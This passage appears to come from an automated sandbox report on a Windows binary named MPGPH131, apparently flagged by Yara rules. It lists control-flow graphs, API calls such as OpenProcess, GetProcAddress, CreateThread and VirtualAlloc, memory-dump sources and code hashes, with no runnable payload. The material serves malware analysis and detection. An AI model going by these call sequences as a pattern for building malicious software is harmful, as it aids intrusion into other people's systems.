                                  • API ID: AddressHandleModuleProcSend
                                  • String ID: 131$50500$Ws2_32.dll
                                  • API String ID: 2819740048-3512819870
                                  • Opcode ID: 79abfe181a1b7f47e359e24d0f1e7fe03b7a4d0757b7eb4621063c4ec8951961
                                  • Instruction ID: 773a88c789b21797d8cd8a8a6ca378d48c499a15bb34424cad8719558783aeba
                                  • Opcode Fuzzy Hash: 79abfe181a1b7f47e359e24d0f1e7fe03b7a4d0757b7eb4621063c4ec8951961
                                  • Instruction Fuzzy Hash: 04D1DF30A04248DFDB14DFA8CC55BADBFB5BF46310F684258D855BB292EB709886CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 197 662f0c-662f2e 198 662f34-662f36 197->198 199 663121 197->199 200 662f62-662f85 198->200 201 662f38-662f57 call 652193 198->201 202 663123-663127 199->202 204 662f87-662f89 200->204 205 662f8b-662f91 200->205 208 662f5a-662f5d 201->208 204->205 207 662f93-662fa4 204->207 205->201 205->207 209 662fa6-662fb4 call 65bbed 207->209 210 662fb7-662fc7 call 662a51 207->210 208->202 209->210 215 663010-663022 210->215 216 662fc9-662fcf 210->216 219 663024-66302a 215->219 220 663079-663099 WriteFile 215->220 217 662fd1-662fd4 216->217 218 662ff8-66300e call 662622 216->218 221 662fd6-662fd9 217->221 222 662fdf-662fee call 6629e9 217->222 240 662ff1-662ff3 218->240 226 663065-663077 call 662ace 219->226 227 66302c-66302f 219->227 224 6630a4 220->224 225 66309b-6630a1 GetLastError 220->225 221->222 230 6630b9-6630bc 221->230 222->240 234 6630a7-6630b2 224->234 225->224 247 66304c-66304f 226->247 228 663051-663063 call 662c92 227->228 229 663031-663034 227->229 228->247 235 6630bf-6630c1 229->235 236 66303a-663047 call 662ba9 229->236 230->235 241 6630b4-6630b7 234->241 242 66311c-66311f 234->242 243 6630c3-6630c8 235->243 244 6630ef-6630fb 235->244 236->247 240->234 241->230 242->202 248 6630e1-6630ea call 65ac78 243->248 249 6630ca-6630dc 243->249 250 663105-663117 244->250 251 6630fd-663103 244->251 247->240 248->208 249->208 250->208 251->199 251->250
                                  APIs
                                    • Part of subcall function 00662622: GetConsoleOutputCP.KERNEL32(FADDE7BB,00000000,00000000,?), ref: 00662685
                                  • WriteFile.KERNELBASE(?,00000000,00656AF7,?,00000000,00000000,00000000,?,00000000,?,0064C023,00656AF7,00000000,0064C023,?,?), ref: 00663091
                                  • GetLastError.KERNEL32(?,00656AF7,00000000,?,0064C023,?,00000000,00000000), ref: 0066309B
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ConsoleErrorFileLastOutputWrite
                                  • String ID:
                                  • API String ID: 2915228174-0
                                  • Opcode ID: 27c8a632ea7d98b2da3662cb89c9c5c226481453b3700f3a444dd9015b3e9162
                                  • Instruction ID: 5b5f11e3b0590da269495c1a731a8f18ceba35c0f1e33cc677a4cf5ed1ee4aff
                                  • Opcode Fuzzy Hash: 27c8a632ea7d98b2da3662cb89c9c5c226481453b3700f3a444dd9015b3e9162
                                  • Instruction Fuzzy Hash: 9661C671D0411AAFDF11DFA8C844AEEBBBABF19304F140149E904AB352D772DA55DB60

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 254 662582-662596 call 66814e 257 66259c-6625a4 254->257 258 662598-66259a 254->258 260 6625a6-6625ad 257->260 261 6625af-6625b2 257->261 259 6625ea-66260a call 6680bd 258->259 269 66261c 259->269 270 66260c-66261a call 65ac78 259->270 260->261 263 6625ba-6625ce call 66814e * 2 260->263 264 6625b4-6625b8 261->264 265 6625d0-6625e0 call 66814e FindCloseChangeNotification 261->265 263->258 263->265 264->263 264->265 265->258 276 6625e2-6625e8 GetLastError 265->276 274 66261e-662621 269->274 270->274 276->259
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00662469,00000000,CF830579,006A1148,0000000C,00662525,0065662D,?), ref: 006625D8
                                  • GetLastError.KERNEL32(?,00662469,00000000,CF830579,006A1148,0000000C,00662525,0065662D,?), ref: 006625E2
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ChangeCloseErrorFindLastNotification
                                  • String ID:
                                  • API String ID: 1687624791-0
                                  • Opcode ID: ac139754206ef6a4f04e01a0d79e839cece2d15668b25600798fdd21571bf296
                                  • Instruction ID: 8e4e21666f555b46426f551e16525f4de65adcc631d7b759068d580670940aa6
                                  • Opcode Fuzzy Hash: ac139754206ef6a4f04e01a0d79e839cece2d15668b25600798fdd21571bf296
                                  • Instruction Fuzzy Hash: C2116B336005515BC73463749C797BD674B9B87734F24030DFD0A8B2D2DE7198C28256

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 279 65bacc-65bae4 call 66814e 282 65bae6-65baed 279->282 283 65bafa-65bb10 SetFilePointerEx 279->283 284 65baf4-65baf8 282->284 285 65bb25-65bb2f 283->285 286 65bb12-65bb23 GetLastError call 65ac78 283->286 287 65bb4b-65bb4e 284->287 285->284 289 65bb31-65bb46 285->289 286->284 289->287
                                  APIs
                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,006A0E00,0064C023,00000002,0064C023,00000000,?,?,?,0065BBD6,00000000,?,0064C023,00000002,006A0E00), ref: 0065BB08
                                  • GetLastError.KERNEL32(0064C023,?,?,?,0065BBD6,00000000,?,0064C023,00000002,006A0E00,00000000,0064C023,00000000,006A0E00,0000000C,00656BCE), ref: 0065BB15
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorFileLastPointer
                                  • String ID:
                                  • API String ID: 2976181284-0
                                  • Opcode ID: e250e0b9294de1fbebb30158c0191d8da4f10ea1f4cb8114ed21abc28b3e9f32
                                  • Instruction ID: 23aa52e679b98d3520941f79751565a15ca390d55e27bdc0cdd5aea59c04b9d7
                                  • Opcode Fuzzy Hash: e250e0b9294de1fbebb30158c0191d8da4f10ea1f4cb8114ed21abc28b3e9f32
                                  • Instruction Fuzzy Hash: 0101C436610155AFCB09CF69DC45DEE7B2BEB85331F240208FC119B291EBB1EE918B90

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 349 5dba20-5dba3f 350 5dbb6c call 572040 349->350 351 5dba45-5dba58 349->351 356 5dbb71 call 571fa0 350->356 352 5dba5a 351->352 353 5dba83-5dba8b 351->353 355 5dba5c-5dba61 352->355 357 5dba8d-5dba92 353->357 358 5dba94-5dbaa4 353->358 359 5dba64-5dba65 call 64cd02 355->359 364 5dbb76-5dbb7b call 652220 356->364 357->355 361 5dbaa6-5dbaab 358->361 362 5dbab3-5dbab5 358->362 369 5dba6a-5dba6f 359->369 361->356 365 5dbab1 361->365 366 5dbac7 362->366 367 5dbab7-5dbac5 call 64cd02 362->367 365->359 368 5dbac9-5dbaec 366->368 367->368 372 5dbaee-5dbb18 call 64e9e0 call 64ef60 368->372 373 5dbb43-5dbb69 call 64e9e0 call 64ef60 368->373 369->364 374 5dba75-5dba81 369->374 385 5dbb2c-5dbb40 call 64cf83 372->385 386 5dbb1a-5dbb28 372->386 374->368 386->364 387 5dbb2a 386->387 387->385
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 005DBB71
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID:
                                  • API String ID: 118556049-0
                                  • Opcode ID: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
                                  • Instruction ID: 6529fcfbb46cf998987f74c5b43e0019763d66c8205c738b590a08474c14a440
                                  • Opcode Fuzzy Hash: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
                                  • Instruction Fuzzy Hash: 40412372900109DBDB25DF6CD8816AEBBA6FF44310F16066BF804EB345D730DE1087A5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 390 64cd02-64cd05 391 64cd14-64cd17 call 65b99c 390->391 393 64cd1c-64cd1f 391->393 394 64cd07-64cd12 call 65f248 393->394 395 64cd21-64cd22 393->395 394->391 398 64cd23-64cd27 394->398 399 571fa0-571ff0 call 571f80 call 64e96b call 64e0c1 398->399 400 64cd2d 398->400 400->400
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00571FDE
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID:
                                  • API String ID: 2659868963-0
                                  • Opcode ID: 322cf9d13eedde78652f7e60c3ec681ba757b9497fc64ac9a7ad59a43de402ea
                                  • Instruction ID: 6516bdd202d6418eafa5fb23458baac5ef8d701f744f5dda222c81d0f3a023c0
                                  • Opcode Fuzzy Hash: 322cf9d13eedde78652f7e60c3ec681ba757b9497fc64ac9a7ad59a43de402ea
                                  • Instruction Fuzzy Hash: 20012B3580020D67C714AFA8EC014897FAEDF02360B508239F9189B540FB70E590C7E5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 407 663e63-663e6e 408 663e70-663e7a 407->408 409 663e7c-663e82 407->409 408->409 410 663eb0-663ebb call 65acaf 408->410 411 663e84-663e85 409->411 412 663e9b-663eac RtlAllocateHeap 409->412 417 663ebd-663ebf 410->417 411->412 413 663e87-663e8e call 661a03 412->413 414 663eae 412->414 413->410 420 663e90-663e99 call 65f248 413->420 414->417 420->410 420->412
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,0064B16C,?), ref: 00663EA4
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 04e187e810cf988ca7cc8c0e6407d37c740b43530f1fce4aef8645a3d689e945
                                  • Instruction ID: 081253c19989c5f338ce8f7533c75637d4145492a353ffa63e3000233f55b81d
                                  • Opcode Fuzzy Hash: 04e187e810cf988ca7cc8c0e6407d37c740b43530f1fce4aef8645a3d689e945
                                  • Instruction Fuzzy Hash: 8DF0B432A00235669B326F728D05B9B374BAF41761B154117BC059A380CB72FE0486F4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 423 66489d-6648a9 424 6648db-6648e6 call 65acaf 423->424 425 6648ab-6648ad 423->425 432 6648e8-6648ea 424->432 427 6648c6-6648d7 RtlAllocateHeap 425->427 428 6648af-6648b0 425->428 429 6648b2-6648b9 call 661a03 427->429 430 6648d9 427->430 428->427 429->424 435 6648bb-6648c4 call 65f248 429->435 430->432 435->424 435->427
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 006648CF
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 20874c1e6fc91679fa91d72bfc8f65db2df595145dc37c2741a4156bf62e72f1
                                  • Instruction ID: eb9db9aeaed8543a4721170cfceb6434afb23abf1391c4ac7680d72ff7f1d231
                                  • Opcode Fuzzy Hash: 20874c1e6fc91679fa91d72bfc8f65db2df595145dc37c2741a4156bf62e72f1
                                  • Instruction Fuzzy Hash: 8EE06D311026A19AE72177A69C05BEB368B9F823B1F15133EAC45A7691DF60DC0082E5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 438 829b8c-829b97 439 829ba0-829ba3 438->439 440 829b99-829b9e 438->440 441 829baa-829bbe VirtualAlloc 439->441 442 829ba5 439->442 440->441 442->441
                                  APIs
                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00829BB7
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmp, Offset: 006D2000, based on PE: true
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 788cc3e1962191186ccee4a8cb5f4d0540ef6b6224f83d3fc9c4b19a6febbf38
                                  • Instruction ID: c0821fa9178ffc9cd42eaffe433bd1444831d6ee6a7c36ab13f279e4cf067211
                                  • Opcode Fuzzy Hash: 788cc3e1962191186ccee4a8cb5f4d0540ef6b6224f83d3fc9c4b19a6febbf38
                                  • Instruction Fuzzy Hash: 03E0EC7530012C9BDB10CE4CE844B5B339EF78A330F108011F549D7605C235EC519771
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 0057A7CD
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0057A7DD
                                  • GetModuleHandleA.KERNEL32(?), ref: 0057A845
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0057A84C
                                  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 0057A858
                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000), ref: 0057A8D1
                                  • CloseHandle.KERNEL32(?), ref: 0057A908
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0057A98D
                                  • ResetEvent.KERNEL32(00000000), ref: 0057A996
                                  • CreateThread.KERNEL32(00000000,00000000,0057A5B0,?,00000000,00000000), ref: 0057A9BA
                                  • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 0057A9C6
                                  • RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 0057AA0C
                                  • CloseHandle.KERNEL32(?), ref: 0057AA4A
                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000001), ref: 0057AA56
                                  • CloseHandle.KERNEL32(?), ref: 0057AA71
                                  • CloseHandle.KERNEL32(00000000), ref: 0057AAD5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Handle$Close$Process$AddressCreateCurrentEventModuleProcString$AnsiObjectOpenResetSingleThreadUnicodeWait
                                  • String ID: File
                                  • API String ID: 3800441322-749574446
                                  • Opcode ID: 023fd1c83c5b7fc3437d01ddeefe0d0d986b893609edcfaedbdd372af587f8a4
                                  • Instruction ID: 9ef2f738bcd1f5ad8afe384794c0842c2bcb31849f21d9998f27885346bcb958
                                  • Opcode Fuzzy Hash: 023fd1c83c5b7fc3437d01ddeefe0d0d986b893609edcfaedbdd372af587f8a4
                                  • Instruction Fuzzy Hash: AEC1DE70D002489FDF15CFA4DD45BAEBBB6FF45300F10406DE909AB292E770A984DBA2
                                  APIs
                                  • GetFileAttributesExW.KERNEL32(?,00000000,?,?,?), ref: 0064B4B3
                                  • GetLastError.KERNEL32(?,?), ref: 0064B4BD
                                  • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0064B4D4
                                  • GetLastError.KERNEL32(?,?), ref: 0064B4DF
                                  • FindClose.KERNEL32(00000000,?,?), ref: 0064B4EB
                                  • ___std_fs_open_handle@16.LIBCPMT ref: 0064B5A4
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorFileFindLast$AttributesCloseFirst___std_fs_open_handle@16
                                  • String ID:
                                  • API String ID: 2340820627-0
                                  • Opcode ID: f082f53864257c284923488ee1574ed18d60b235756e587150fc89b6009ddfc4
                                  • Instruction ID: 1f44d4dbd892cc042da00556544a7be278ad3c825b1f5cfcca071788bb88a6f2
                                  • Opcode Fuzzy Hash: f082f53864257c284923488ee1574ed18d60b235756e587150fc89b6009ddfc4
                                  • Instruction Fuzzy Hash: 4A71AF74A006199FDB64CF28DC84BE9B7BABF05320F145259E859E3390DB70DE51CB91
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,0066E1D6,?,?), ref: 0066DF5D
                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,0066E1D6,?,?), ref: 0066DF86
                                  • GetACP.KERNEL32(?,?,0066E1D6,?,?), ref: 0066DF9B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
